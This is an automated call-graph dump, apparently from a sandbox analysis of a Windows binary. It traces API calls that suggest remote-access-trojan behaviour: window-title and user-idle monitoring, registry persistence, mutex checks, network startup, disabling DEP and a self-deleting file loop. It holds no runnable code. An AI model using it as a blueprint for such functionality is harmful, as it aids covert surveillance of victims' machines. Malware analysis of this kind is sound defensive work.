53727 41bc1f 28 API calls 53724->53727 53726 4170e5 53725->53726 53728 415be9 53727->53728 53812 41bb27 53728->53812 53733 401e65 22 API calls 53734 415c13 53733->53734 53735 402f31 28 API calls 53734->53735 53736 415c21 53735->53736 53821 402ea1 28 API calls 53736->53821 53738 415c30 53739 402f10 28 API calls 53738->53739 53740 415c3f 53739->53740 53822 402ea1 28 API calls 53740->53822 53742 415c4e 53743 402f10 28 API calls 53742->53743 53744 415c5a 53743->53744 53823 402ea1 28 API calls 53744->53823 53746 415c64 53747 404aa1 61 API calls 53746->53747 53748 415c73 53747->53748 53749 401fd8 11 API calls 53748->53749 53750 415c7c 53749->53750 53751 401fd8 11 API calls 53750->53751 53752 415c88 53751->53752 53753 401fd8 11 API calls 53752->53753 53754 415c94 53753->53754 53755 401fd8 11 API calls 53754->53755 53756 415ca0 53755->53756 53757 401fd8 11 API calls 53756->53757 53758 415cac 53757->53758 53759 401fd8 11 API calls 53758->53759 53760 415cb8 53759->53760 53824 401f09 53760->53824 53763 401fd8 11 API calls 53764 415cca 53763->53764 53765 401fd8 11 API calls 53764->53765 53766 415cd3 53765->53766 53767 401e65 22 API calls 53766->53767 53768 415cde 53767->53768 53827 43bb2c 53768->53827 53771 415cf0 53774 415d09 53771->53774 53775 415cfe 53771->53775 53772 415d16 53773 401e65 22 API calls 53772->53773 53773->53715 53832 404f51 53774->53832 53831 404ff4 82 API calls 53775->53831 53847 4050e4 84 API calls 53778->53847 53779 415d04 53779->53780 53780->53716 53848 40423a 53781->53848 53785 4020df 11 API calls 53784->53785 53805 41bebf 53785->53805 53786 41bf2f 53787 401fd8 11 API calls 53786->53787 53788 41bf61 53787->53788 53789 401fd8 11 API calls 53788->53789 53791 41bf69 53789->53791 53790 41bf31 53792 4041a2 28 API calls 53790->53792 53794 401fd8 11 API calls 53791->53794 53795 41bf3d 53792->53795 53793 4041a2 28 API calls 53793->53805 53796 415ba1 53794->53796 53797 401fe2 28 API calls 53795->53797 53796->53714 53796->53715 53796->53780 53799 41bf46 53797->53799 53798 401fe2 28 API calls 53798->53805 53801 401fd8 11 API calls 53799->53801 53800 401fd8 11 API calls 53800->53805 53802 41bf4e 53801->53802 53803 41cec5 28 API calls 53802->53803 53803->53786 53805->53786 53805->53790 53805->53793 53805->53798 53805->53800 53854 41cec5 53805->53854 53879 441ed1 53806->53879 53809 402093 28 API calls 53810 415bd2 53809->53810 53811 41bb77 GetLastInputInfo GetTickCount 53810->53811 53811->53724 53888 436f10 53812->53888 53817 41bdaf 53818 41bdbc 53817->53818 53819 4020b7 28 API calls 53818->53819 53820 415c05 53819->53820 53820->53733 53821->53738 53822->53742 53823->53746 53825 402252 11 API calls 53824->53825 53826 401f12 53825->53826 53826->53763 53828 43bb45 _strftime 53827->53828 53937 43ae83 53828->53937 53830 415ceb 53830->53771 53830->53772 53831->53779 53833 404fea 53832->53833 53834 404f65 53832->53834 53833->53780 53835 404f6e 53834->53835 53836 404fc0 CreateEventA CreateThread 53834->53836 53837 404f7d GetLocalTime 53834->53837 53835->53836 53836->53833 53966 405150 53836->53966 53838 41bc1f 28 API calls 53837->53838 53839 404f91 53838->53839 53965 4052fd 28 API calls 53839->53965 53847->53779 53849 404243 53848->53849 53850 4023ce 11 API calls 53849->53850 53851 40424e 53850->53851 53852 402569 28 API calls 53851->53852 53853 4041b5 53852->53853 53853->53708 53855 41ced2 53854->53855 53856 41cf31 53855->53856 53861 41cee2 53855->53861 53857 41cf4b 53856->53857 53870 41d071 28 API calls 53856->53870 53859 41d1d7 28 API calls 53857->53859 53860 41cf2d 53859->53860 53860->53805 53862 41cf1a 53861->53862 53865 41d071 28 API calls 53861->53865 53866 41d1d7 53862->53866 53865->53862 53867 41d1e0 53866->53867 53871 41d283 53867->53871 53870->53857 53872 41d28c 53871->53872 53875 41d331 53872->53875 53877 41d33c 53875->53877 53876 41d1ea 53876->53860 53877->53876 53878 4020f6 28 API calls 53877->53878 53878->53876 53880 441edd 53879->53880 53883 441ccd 53880->53883 53882 41bc43 53882->53809 53884 441ce4 53883->53884 53886 441d1b _strftime 53884->53886 53887 44062d 20 API calls __dosmaperr 53884->53887 53886->53882 53887->53886 53889 41bb46 GetForegroundWindow GetWindowTextW 53888->53889 53890 40417e 53889->53890 53891 404186 53890->53891 53896 402252 53891->53896 53893 404191 53900 4041bc 53893->53900 53897 40225c 53896->53897 53898 4022ac 53896->53898 53897->53898 53904 402779 11 API calls std::_Deallocate 53897->53904 53898->53893 53901 4041c8 53900->53901 53905 4041d9 53901->53905 53903 40419c 53903->53817 53904->53898 53906 4041e9 53905->53906 53907 404206 53906->53907 53908 4041ef 53906->53908 53922 4027e6 53907->53922 53912 404267 53908->53912 53911 404204 53911->53903 53913 402888 22 API calls 53912->53913 53914 40427b 53913->53914 53915 404290 53914->53915 53916 4042a5 53914->53916 53933 4042df 22 API calls 53915->53933 53917 4027e6 28 API calls 53916->53917 53921 4042a3 53917->53921 53919 404299 53934 402c48 22 API calls 53919->53934 53921->53911 53923 4027ef 53922->53923 53924 402851 53923->53924 53925 4027f9 53923->53925 53936 4028a4 22 API calls 53924->53936 53928 402802 53925->53928 53930 402815 53925->53930 53935 402aea 28 API calls __EH_prolog 53928->53935 53931 402813 53930->53931 53932 402252 11 API calls 53930->53932 53931->53911 53932->53931 53933->53919 53934->53921 53935->53931 53953 43ba8a 53937->53953 53939 43aed0 53959 43a837 36 API calls 3 library calls 53939->53959 53940 43ae95 53940->53939 53941 43aeaa 53940->53941 53952 43aeaf _strftime 53940->53952 53958 44062d 20 API calls __dosmaperr 53941->53958 53945 43aedc 53946 43af0b 53945->53946 53960 43bacf 40 API calls __Tolower 53945->53960 53949 43af77 53946->53949 53961 43ba36 20 API calls 2 library calls 53946->53961 53962 43ba36 20 API calls 2 library calls 53949->53962 53950 43b03e _strftime 53950->53952 53963 44062d 20 API calls __dosmaperr 53950->53963 53952->53830 53954 43baa2 53953->53954 53955 43ba8f 53953->53955 53954->53940 53964 44062d 20 API calls __dosmaperr 53955->53964 53957 43ba94 _strftime 53957->53940 53958->53952 53959->53945 53960->53945 53961->53949 53962->53950 53963->53952 53964->53957 53969 40515c 102 API calls 53966->53969 53968 405159 53969->53968 53970->53687 53971 434918 53972 434924 ___FrameUnwindToState 53971->53972 53998 434627 53972->53998 53974 43492b 53976 434954 53974->53976 54296 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 53974->54296 53985 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 53976->53985 54297 4442d2 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 53976->54297 53978 43496d 53980 434973 ___FrameUnwindToState 53978->53980 54298 444276 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 53978->54298 53981 4349f3 54009 434ba5 53981->54009 53985->53981 54299 443487 36 API calls 5 library calls 53985->54299 53991 434a15 53992 434a1f 53991->53992 54301 4434bf 28 API calls _Atexit 53991->54301 53994 434a28 53992->53994 54302 443462 28 API calls _Atexit 53992->54302 54303 43479e 13 API calls 2 library calls 53994->54303 53997 434a30 53997->53980 53999 434630 53998->53999 54304 434cb6 IsProcessorFeaturePresent 53999->54304 54001 43463c 54305 438fb1 10 API calls 4 library calls 54001->54305 54003 434641 54004 434645 54003->54004 54306 44415f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 54003->54306 54004->53974 54006 43464e 54007 43465c 54006->54007 54307 438fda 8 API calls 3 library calls 54006->54307 54007->53974 54010 436f10 ___scrt_fastfail 54009->54010 54011 434bb8 GetStartupInfoW 54010->54011 54012 4349f9 54011->54012 54013 444223 54012->54013 54308 44f0d9 54013->54308 54015 44422c 54017 434a02 54015->54017 54312 446895 36 API calls 54015->54312 54018 40ea00 54017->54018 54314 41cbe1 LoadLibraryA GetProcAddress 54018->54314 54020 40ea1c GetModuleFileNameW 54319 40f3fe 54020->54319 54022 40ea38 54023 4020f6 28 API calls 54022->54023 54024 40ea47 54023->54024 54025 4020f6 28 API calls 54024->54025 54026 40ea56 54025->54026 54027 41beac 28 API calls 54026->54027 54028 40ea5f 54027->54028 54334 40fb52 54028->54334 54030 40ea68 54031 401e8d 11 API calls 54030->54031 54032 40ea71 54031->54032 54033 40ea84 54032->54033 54034 40eace 54032->54034 54528 40fbee 118 API calls 54033->54528 54035 401e65 22 API calls 54034->54035 54037 40eade 54035->54037 54041 401e65 22 API calls 54037->54041 54038 40ea96 54039 401e65 22 API calls 54038->54039 54040 40eaa2 54039->54040 54529 410f72 36 API calls __EH_prolog 54040->54529 54042 40eafd 54041->54042 54043 40531e 28 API calls 54042->54043 54045 40eb0c 54043->54045 54047 406383 28 API calls 54045->54047 54046 40eab4 54530 40fb9f 78 API calls 54046->54530 54049 40eb18 54047->54049 54051 401fe2 28 API calls 54049->54051 54050 40eabd 54531 40f3eb 71 API calls 54050->54531 54053 40eb24 54051->54053 54054 401fd8 11 API calls 54053->54054 54055 40eb2d 54054->54055 54057 401fd8 11 API calls 54055->54057 54056 401fd8 11 API calls 54058 40ef36 54056->54058 54059 40eb36 54057->54059 54300 443396 GetModuleHandleW 54058->54300 54060 401e65 22 API calls 54059->54060 54061 40eb3f 54060->54061 54062 401fc0 28 API calls 54061->54062 54063 40eb4a 54062->54063 54064 401e65 22 API calls 54063->54064 54065 40eb63 54064->54065 54066 401e65 22 API calls 54065->54066 54067 40eb7e 54066->54067 54068 40ebe9 54067->54068 54532 406c59 54067->54532 54069 401e65 22 API calls 54068->54069 54074 40ebf6 54069->54074 54071 40ebab 54072 401fe2 28 API calls 54071->54072 54073 40ebb7 54072->54073 54076 401fd8 11 API calls 54073->54076 54075 40ec3d 54074->54075 54081 413584 3 API calls 54074->54081 54338 40d0a4 54075->54338 54078 40ebc0 54076->54078 54537 413584 RegOpenKeyExA 54078->54537 54079 40ec43 54080 40eac6 54079->54080 54341 41b354 54079->54341 54080->54056 54087 40ec21 54081->54087 54085 40f38a 54630 4139e4 30 API calls 54085->54630 54086 40ec5e 54089 40ecb1 54086->54089 54358 407751 54086->54358 54087->54075 54540 4139e4 30 API calls 54087->54540 54090 401e65 22 API calls 54089->54090 54093 40ecba 54090->54093 54102 40ecc6 54093->54102 54103 40eccb 54093->54103 54095 40f3a0 54631 4124b0 65 API calls ___scrt_fastfail 54095->54631 54096 40ec87 54100 401e65 22 API calls 54096->54100 54097 40ec7d 54541 407773 30 API calls 54097->54541 54112 40ec90 54100->54112 54101 40f3aa 54105 41bcef 28 API calls 54101->54105 54544 407790 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 54102->54544 54108 401e65 22 API calls 54103->54108 54104 40ec82 54542 40729b 98 API calls 54104->54542 54109 40f3ba 54105->54109 54110 40ecd4 54108->54110 54430 413a5e RegOpenKeyExW 54109->54430 54362 41bcef 54110->54362 54112->54089 54117 40ecac 54112->54117 54113 40ecdf 54366 401f13 54113->54366 54543 40729b 98 API calls 54117->54543 54119 401f09 11 API calls 54121 40f3d7 54119->54121 54124 401f09 11 API calls 54121->54124 54122 401f09 11 API calls 54123 40ecf3 54122->54123 54125 401e65 22 API calls 54123->54125 54126 40f3e0 54124->54126 54127 40ecfc 54125->54127 54433 40dd7d 54126->54433 54131 401e65 22 API calls 54127->54131 54133 40ed16 54131->54133 54132 40f3ea 54134 401e65 22 API calls 54133->54134 54135 40ed30 54134->54135 54136 401e65 22 API calls 54135->54136 54137 40ed49 54136->54137 54138 40edb6 54137->54138 54139 401e65 22 API calls 54137->54139 54140 40edc5 54138->54140 54145 40ef41 ___scrt_fastfail 54138->54145 54144 40ed5e _wcslen 54139->54144 54141 40edce 54140->54141 54169 40ee4a ___scrt_fastfail 54140->54169 54142 401e65 22 API calls 54141->54142 54143 40edd7 54142->54143 54146 401e65 22 API calls 54143->54146 54144->54138 54147 401e65 22 API calls 54144->54147 54605 413733 RegOpenKeyExA 54145->54605 54148 40ede9 54146->54148 54149 40ed79 54147->54149 54151 401e65 22 API calls 54148->54151 54153 401e65 22 API calls 54149->54153 54152 40edfb 54151->54152 54156 401e65 22 API calls 54152->54156 54154 40ed8e 54153->54154 54545 40da6f 54154->54545 54155 40ef8c 54157 401e65 22 API calls 54155->54157 54159 40ee24 54156->54159 54160 40efb1 54157->54160 54164 401e65 22 API calls 54159->54164 54165 402093 28 API calls 54160->54165 54162 401f13 28 API calls 54163 40edad 54162->54163 54166 401f09 11 API calls 54163->54166 54167 40ee35 54164->54167 54168 40efc3 54165->54168 54166->54138 54603 40ce34 46 API calls _wcslen 54167->54603 54385 4137aa RegCreateKeyA 54168->54385 54375 413982 54169->54375 54174 40eede ctype 54178 401e65 22 API calls 54174->54178 54175 40ee45 54175->54169 54176 401e65 22 API calls 54177 40efe5 54176->54177 54180 43bb2c _strftime 40 API calls 54177->54180 54179 40eef5 54178->54179 54179->54155 54182 40ef09 54179->54182 54181 40eff2 54180->54181 54183 40effc 54181->54183 54185 40f01f 54181->54185 54184 401e65 22 API calls 54182->54184 54608 41ce2c 88 API calls ___scrt_fastfail 54183->54608 54186 40ef12 54184->54186 54188 402093 28 API calls 54185->54188 54189 41bcef 28 API calls 54186->54189 54191 40f034 54188->54191 54192 40ef1e 54189->54192 54190 40f003 CreateThread 54190->54185 55093 41d4ee 10 API calls 54190->55093 54193 402093 28 API calls 54191->54193 54604 40f4af 114 API calls 54192->54604 54195 40f043 54193->54195 54197 41b580 80 API calls 54195->54197 54196 40ef23 54196->54155 54198 40ef2a 54196->54198 54199 40f048 54197->54199 54198->54080 54200 401e65 22 API calls 54199->54200 54201 40f054 54200->54201 54202 401e65 22 API calls 54201->54202 54203 40f066 54202->54203 54204 401e65 22 API calls 54203->54204 54205 40f086 54204->54205 54206 43bb2c _strftime 40 API calls 54205->54206 54207 40f093 54206->54207 54208 401e65 22 API calls 54207->54208 54209 40f09e 54208->54209 54210 401e65 22 API calls 54209->54210 54211 40f0af 54210->54211 54212 401e65 22 API calls 54211->54212 54213 40f0c4 54212->54213 54214 401e65 22 API calls 54213->54214 54215 40f0d5 54214->54215 54216 40f0dc StrToIntA 54215->54216 54391 409e1f 54216->54391 54219 401e65 22 API calls 54220 40f0f7 54219->54220 54221 40f103 54220->54221 54222 40f13c 54220->54222 54609 43455e 54221->54609 54224 401e65 22 API calls 54222->54224 54226 40f14c 54224->54226 54230 40f194 54226->54230 54231 40f158 54226->54231 54227 401e65 22 API calls 54228 40f11f 54227->54228 54229 40f126 CreateThread 54228->54229 54229->54222 55090 41a045 113 API calls 2 library calls 54229->55090 54232 401e65 22 API calls 54230->54232 54233 43455e new 22 API calls 54231->54233 54234 40f19d 54232->54234 54235 40f161 54233->54235 54238 40f207 54234->54238 54239 40f1a9 54234->54239 54236 401e65 22 API calls 54235->54236 54237 40f173 54236->54237 54242 40f17a CreateThread 54237->54242 54240 401e65 22 API calls 54238->54240 54241 401e65 22 API calls 54239->54241 54243 40f210 54240->54243 54244 40f1b9 54241->54244 54242->54230 55089 41a045 113 API calls 2 library calls 54242->55089 54245 40f255 54243->54245 54246 40f21c 54243->54246 54247 401e65 22 API calls 54244->54247 54416 41b69e GetComputerNameExW GetUserNameW 54245->54416 54249 401e65 22 API calls 54246->54249 54250 40f1ce 54247->54250 54252 40f225 54249->54252 54616 40da23 54250->54616 54257 401e65 22 API calls 54252->54257 54253 401f13 28 API calls 54254 40f269 54253->54254 54256 401f09 11 API calls 54254->54256 54260 40f272 54256->54260 54261 40f23a 54257->54261 54259 401f13 28 API calls 54262 40f1ed 54259->54262 54263 40f27b SetProcessDEPPolicy 54260->54263 54264 40f27e CreateThread 54260->54264 54270 43bb2c _strftime 40 API calls 54261->54270 54265 401f09 11 API calls 54262->54265 54263->54264 54266 40f293 CreateThread 54264->54266 54267 40f29f 54264->54267 55062 40f7e2 54264->55062 54271 40f1f6 CreateThread 54265->54271 54266->54267 55091 412132 146 API calls 54266->55091 54268 40f2b4 54267->54268 54269 40f2a8 CreateThread 54267->54269 54273 40f307 54268->54273 54275 402093 28 API calls 54268->54275 54269->54268 55092 412716 38 API calls ___scrt_fastfail 54269->55092 54272 40f247 54270->54272 54271->54238 55094 401be9 50 API calls _strftime 54271->55094 54627 40c19d 7 API calls 54272->54627 54427 41353a RegOpenKeyExA 54273->54427 54276 40f2d7 54275->54276 54628 4052fd 28 API calls 54276->54628 54281 40f328 54283 41bcef 28 API calls 54281->54283 54285 40f338 54283->54285 54629 413656 31 API calls 54285->54629 54290 40f34e 54291 401f09 11 API calls 54290->54291 54294 40f359 54291->54294 54292 40f381 DeleteFileW 54293 40f388 54292->54293 54292->54294 54293->54101 54294->54101 54294->54292 54295 40f36f Sleep 54294->54295 54295->54294 54296->53974 54297->53978 54298->53985 54299->53981 54300->53991 54301->53992 54302->53994 54303->53997 54304->54001 54305->54003 54306->54006 54307->54004 54309 44f0eb 54308->54309 54310 44f0e2 54308->54310 54309->54015 54313 44efd8 49 API calls 4 library calls 54310->54313 54312->54015 54313->54309 54315 41cc20 LoadLibraryA GetProcAddress 54314->54315 54316 41cc10 GetModuleHandleA GetProcAddress 54314->54316 54317 41cc49 44 API calls 54315->54317 54318 41cc39 LoadLibraryA GetProcAddress 54315->54318 54316->54315 54317->54020 54318->54317 54632 41b539 FindResourceA 54319->54632 54322 43bda0 new 21 API calls 54323 40f428 ctype 54322->54323 54324 4020b7 28 API calls 54323->54324 54325 40f443 54324->54325 54326 401fe2 28 API calls 54325->54326 54327 40f44e 54326->54327 54328 401fd8 11 API calls 54327->54328 54329 40f457 54328->54329 54330 43bda0 new 21 API calls 54329->54330 54331 40f468 ctype 54330->54331 54635 406e13 54331->54635 54333 40f49b 54333->54022 54335 40fb5e 54334->54335 54337 40fb65 54334->54337 54638 402163 11 API calls 54335->54638 54337->54030 54639 401fab 54338->54639 54340 40d0ae CreateMutexA GetLastError 54340->54079 54640 41c048 54341->54640 54346 401fe2 28 API calls 54347 41b390 54346->54347 54348 401fd8 11 API calls 54347->54348 54349 41b398 54348->54349 54350 4135e1 31 API calls 54349->54350 54352 41b3ee 54349->54352 54351 41b3c1 54350->54351 54353 41b3cc StrToIntA 54351->54353 54352->54086 54354 41b3e3 54353->54354 54355 41b3da 54353->54355 54357 401fd8 11 API calls 54354->54357 54649 41cffa 22 API calls 54355->54649 54357->54352 54359 407765 54358->54359 54360 413584 3 API calls 54359->54360 54361 40776c 54360->54361 54361->54096 54361->54097 54363 41bd03 54362->54363 54650 40b93f 54363->54650 54365 41bd0b 54365->54113 54367 401f22 54366->54367 54374 401f6a 54366->54374 54368 402252 11 API calls 54367->54368 54369 401f2b 54368->54369 54370 401f6d 54369->54370 54372 401f46 54369->54372 54665 402336 54370->54665 54664 40305c 28 API calls 54372->54664 54374->54122 54376 4139a0 54375->54376 54377 406e13 28 API calls 54376->54377 54378 4139b5 54377->54378 54379 4020f6 28 API calls 54378->54379 54380 4139c5 54379->54380 54381 4137aa 14 API calls 54380->54381 54382 4139cf 54381->54382 54383 401fd8 11 API calls 54382->54383 54384 4139dc 54383->54384 54384->54174 54386 4137fa 54385->54386 54388 4137c3 54385->54388 54387 401fd8 11 API calls 54386->54387 54389 40efd9 54387->54389 54390 4137d5 RegSetValueExA RegCloseKey 54388->54390 54389->54176 54390->54386 54392 409e3d _wcslen 54391->54392 54393 409e48 54392->54393 54394 409e5f 54392->54394 54395 40da6f 32 API calls 54393->54395 54396 40da6f 32 API calls 54394->54396 54397 409e50 54395->54397 54398 409e67 54396->54398 54399 401f13 28 API calls 54397->54399 54400 401f13 28 API calls 54398->54400 54401 409e5a 54399->54401 54402 409e75 54400->54402 54404 401f09 11 API calls 54401->54404 54403 401f09 11 API calls 54402->54403 54405 409e7d 54403->54405 54406 409eb4 54404->54406 54684 409196 28 API calls 54405->54684 54669 40a144 54406->54669 54409 409e8f 54685 403014 54409->54685 54413 401f13 28 API calls 54414 409ea4 54413->54414 54415 401f09 11 API calls 54414->54415 54415->54401 54417 40417e 28 API calls 54416->54417 54418 41b6ed 54417->54418 54884 4042fc 54418->54884 54421 403014 28 API calls 54422 41b703 54421->54422 54423 401f09 11 API calls 54422->54423 54424 41b70c 54423->54424 54425 401f09 11 API calls 54424->54425 54426 40f25e 54425->54426 54426->54253 54428 41355b RegQueryValueExA RegCloseKey 54427->54428 54429 40f31f 54427->54429 54428->54429 54429->54126 54429->54281 54431 40f3cd 54430->54431 54432 413a7a RegDeleteValueW 54430->54432 54431->54119 54432->54431 54434 40dd96 54433->54434 54435 41353a 3 API calls 54434->54435 54436 40dd9d 54435->54436 54437 40ddbc 54436->54437 54959 401707 54436->54959 54441 414f65 54437->54441 54439 40ddaa 54962 4138b2 RegCreateKeyA 54439->54962 54442 4020df 11 API calls 54441->54442 54443 414f79 54442->54443 54965 41b944 54443->54965 54446 4020df 11 API calls 54447 414f8f 54446->54447 54448 401e65 22 API calls 54447->54448 54449 414f9d 54448->54449 54450 43bb2c _strftime 40 API calls 54449->54450 54451 414faa 54450->54451 54452 414fbc 54451->54452 54453 414faf Sleep 54451->54453 54454 402093 28 API calls 54452->54454 54453->54452 54455 414fcb 54454->54455 54456 401e65 22 API calls 54455->54456 54457 414fd4 54456->54457 54458 4020f6 28 API calls 54457->54458 54459 414fdf 54458->54459 54460 41beac 28 API calls 54459->54460 54461 414fe7 54460->54461 54969 40489e WSAStartup 54461->54969 54463 414ff1 54464 401e65 22 API calls 54463->54464 54465 414ffa 54464->54465 54466 401e65 22 API calls 54465->54466 54491 415079 54465->54491 54467 415013 54466->54467 54468 401e65 22 API calls 54467->54468 54470 415024 54468->54470 54469 4020f6 28 API calls 54469->54491 54472 401e65 22 API calls 54470->54472 54471 41beac 28 API calls 54471->54491 54473 415035 54472->54473 54475 401e65 22 API calls 54473->54475 54474 406c59 28 API calls 54474->54491 54476 415046 54475->54476 54477 401e65 22 API calls 54476->54477 54479 415057 54477->54479 54478 401fe2 28 API calls 54478->54491 54480 401e65 22 API calls 54479->54480 54481 415069 54480->54481 54994 40473d 89 API calls 54481->54994 54483 40531e 28 API calls 54483->54491 54484 401e65 22 API calls 54484->54491 54486 4151c7 WSAGetLastError 54995 41cb72 30 API calls 54486->54995 54488 40482d 3 API calls 54488->54491 54490 404f51 105 API calls 54490->54491 54491->54469 54491->54471 54491->54474 54491->54478 54491->54483 54491->54484 54491->54486 54491->54488 54491->54490 54492 4048c8 97 API calls 54491->54492 54493 404e26 99 API calls 54491->54493 54495 401e8d 11 API calls 54491->54495 54496 415a6e 54491->54496 54499 402093 28 API calls 54491->54499 54500 41b580 80 API calls 54491->54500 54503 409097 28 API calls 54491->54503 54504 441ed1 20 API calls 54491->54504 54505 413733 3 API calls 54491->54505 54506 4135e1 31 API calls 54491->54506 54507 40417e 28 API calls 54491->54507 54510 41bdaf 28 API calls 54491->54510 54511 41bc1f 28 API calls 54491->54511 54512 401e65 22 API calls 54491->54512 54516 41bb27 30 API calls 54491->54516 54518 402f31 28 API calls 54491->54518 54519 402ea1 28 API calls 54491->54519 54520 402f10 28 API calls 54491->54520 54521 406383 28 API calls 54491->54521 54522 404aa1 61 API calls 54491->54522 54523 401fd8 11 API calls 54491->54523 54524 404c10 130 API calls 54491->54524 54526 415aac CreateThread 54491->54526 54527 401f09 11 API calls 54491->54527 54970 414f24 54491->54970 54975 41b871 54491->54975 54978 4145f8 54491->54978 54981 40ddc4 54491->54981 54987 41bcd3 54491->54987 54990 41bb77 GetLastInputInfo GetTickCount 54491->54990 54991 40f90c GetLocaleInfoA 54491->54991 54996 4052fd 28 API calls 54491->54996 54492->54491 54493->54491 54494 401e65 22 API calls 54494->54496 54495->54491 54496->54494 54497 43bb2c _strftime 40 API calls 54496->54497 54997 40b08c 85 API calls 54496->54997 54498 415b0a Sleep 54497->54498 54498->54491 54499->54491 54500->54491 54503->54491 54504->54491 54505->54491 54506->54491 54507->54491 54510->54491 54511->54491 54513 415474 GetTickCount 54512->54513 54514 41bc1f 28 API calls 54513->54514 54514->54491 54516->54491 54518->54491 54519->54491 54520->54491 54521->54491 54522->54491 54523->54491 54524->54491 54526->54491 55038 41ada8 106 API calls 54526->55038 54527->54491 54528->54038 54529->54046 54530->54050 54533 4020df 11 API calls 54532->54533 54534 406c65 54533->54534 54535 4032a0 28 API calls 54534->54535 54536 406c82 54535->54536 54536->54071 54538 40ebdf 54537->54538 54539 4135ae RegQueryValueExA RegCloseKey 54537->54539 54538->54068 54538->54085 54539->54538 54540->54075 54541->54104 54542->54096 54543->54089 54544->54103 54546 401f86 11 API calls 54545->54546 54547 40da8b 54546->54547 54548 40dae0 54547->54548 54549 40daab 54547->54549 54550 40daa1 54547->54550 54551 41c048 2 API calls 54548->54551 55054 41b645 29 API calls 54549->55054 54553 40dbd4 GetLongPathNameW 54550->54553 54555 40dae5 54551->54555 54554 40417e 28 API calls 54553->54554 54557 40dbe9 54554->54557 54558 40dae9 54555->54558 54559 40db3b 54555->54559 54556 40dab4 54560 401f13 28 API calls 54556->54560 54561 40417e 28 API calls 54557->54561 54563 40417e 28 API calls 54558->54563 54562 40417e 28 API calls 54559->54562 54564 40dabe 54560->54564 54565 40dbf8 54561->54565 54566 40db49 54562->54566 54567 40daf7 54563->54567 54569 401f09 11 API calls 54564->54569 55039 40de0c 54565->55039 54572 40417e 28 API calls 54566->54572 54573 40417e 28 API calls 54567->54573 54569->54550 54575 40db5f 54572->54575 54576 40db0d 54573->54576 54578 402fa5 28 API calls 54575->54578 54579 402fa5 28 API calls 54576->54579 54577 402fa5 28 API calls 54580 40dc20 54577->54580 54581 40db6a 54578->54581 54582 40db18 54579->54582 54583 401f09 11 API calls 54580->54583 54584 401f13 28 API calls 54581->54584 54585 401f13 28 API calls 54582->54585 54586 40dc2a 54583->54586 54587 40db75 54584->54587 54588 40db23 54585->54588 54589 401f09 11 API calls 54586->54589 54590 401f09 11 API calls 54587->54590 54591 401f09 11 API calls 54588->54591 54593 40dc33 54589->54593 54594 40db7e 54590->54594 54592 40db2c 54591->54592 54596 401f09 11 API calls 54592->54596 54597 401f09 11 API calls 54593->54597 54595 401f09 11 API calls 54594->54595 54595->54564 54596->54564 54598 40dc3c 54597->54598 54599 401f09 11 API calls 54598->54599 54600 40dc45 54599->54600 54601 401f09 11 API calls 54600->54601 54602 40dc4e 54601->54602 54602->54162 54603->54175 54604->54196 54606 413759 RegQueryValueExA RegCloseKey 54605->54606 54607 41377d 54605->54607 54606->54607 54607->54155 54608->54190 54611 434563 54609->54611 54610 43bda0 new 21 API calls 54610->54611 54611->54610 54612 40f10c 54611->54612 55059 443001 7 API calls 2 library calls 54611->55059 55060 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 54611->55060 55061 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 54611->55061 54612->54227 54617 402093 28 API calls 54616->54617 54618 40da3a 54617->54618 54619 41bcef 28 API calls 54618->54619 54620 40da45 54619->54620 54621 40da6f 32 API calls 54620->54621 54622 40da56 54621->54622 54623 401f09 11 API calls 54622->54623 54624 40da5f 54623->54624 54625 401fd8 11 API calls 54624->54625 54626 40da67 54625->54626 54626->54259 54627->54245 54629->54290 54630->54095 54633 41b556 LoadResource LockResource SizeofResource 54632->54633 54634 40f419 54632->54634 54633->54634 54634->54322 54636 4020b7 28 API calls 54635->54636 54637 406e27 54636->54637 54637->54333 54638->54337 54641 41b362 54640->54641 54642 41c055 GetCurrentProcess IsWow64Process 54640->54642 54644 4135e1 RegOpenKeyExA 54641->54644 54642->54641 54643 41c06c 54642->54643 54643->54641 54645 41360f RegQueryValueExA RegCloseKey 54644->54645 54646 413639 54644->54646 54645->54646 54647 402093 28 API calls 54646->54647 54648 41364e 54647->54648 54648->54346 54649->54354 54651 40b947 54650->54651 54652 402252 11 API calls 54651->54652 54653 40b952 54652->54653 54656 40b967 54653->54656 54655 40b961 54655->54365 54657 40b9a1 54656->54657 54658 40b973 54656->54658 54663 4028a4 22 API calls 54657->54663 54659 4027e6 28 API calls 54658->54659 54662 40b97d 54659->54662 54662->54655 54664->54374 54666 402347 54665->54666 54667 402252 11 API calls 54666->54667 54668 4023c7 54667->54668 54668->54374 54670 40a162 54669->54670 54671 413584 3 API calls 54670->54671 54672 40a169 54671->54672 54673 40a197 54672->54673 54674 40a17d 54672->54674 54690 409097 54673->54690 54675 40a182 54674->54675 54676 409ed6 54674->54676 54678 409097 28 API calls 54675->54678 54676->54219 54681 40a190 54678->54681 54718 40a268 29 API calls 54681->54718 54683 40a195 54683->54676 54684->54409 54852 403222 54685->54852 54687 403022 54856 403262 54687->54856 54691 4090ad 54690->54691 54692 402252 11 API calls 54691->54692 54693 4090c7 54692->54693 54694 404267 28 API calls 54693->54694 54695 4090d5 54694->54695 54696 40a1b4 54695->54696 54719 40b927 54696->54719 54699 40a205 54702 402093 28 API calls 54699->54702 54700 40a1dd 54701 402093 28 API calls 54700->54701 54703 40a1e7 54701->54703 54704 40a210 54702->54704 54705 41bcef 28 API calls 54703->54705 54706 402093 28 API calls 54704->54706 54707 40a1f5 54705->54707 54708 40a21f 54706->54708 54723 40b19f 31 API calls new 54707->54723 54710 41b580 80 API calls 54708->54710 54712 40a224 CreateThread 54710->54712 54711 40a1fc 54713 401fd8 11 API calls 54711->54713 54714 40a24b CreateThread 54712->54714 54715 40a23f CreateThread 54712->54715 54731 40a2b8 54712->54731 54713->54699 54716 401f09 11 API calls 54714->54716 54728 40a2c4 54714->54728 54715->54714 54725 40a2a2 54715->54725 54717 40a25f 54716->54717 54717->54676 54718->54683 54851 40a2ae 164 API calls 54718->54851 54720 40b930 54719->54720 54721 40a1d2 54719->54721 54724 40b9a7 28 API calls 54720->54724 54721->54699 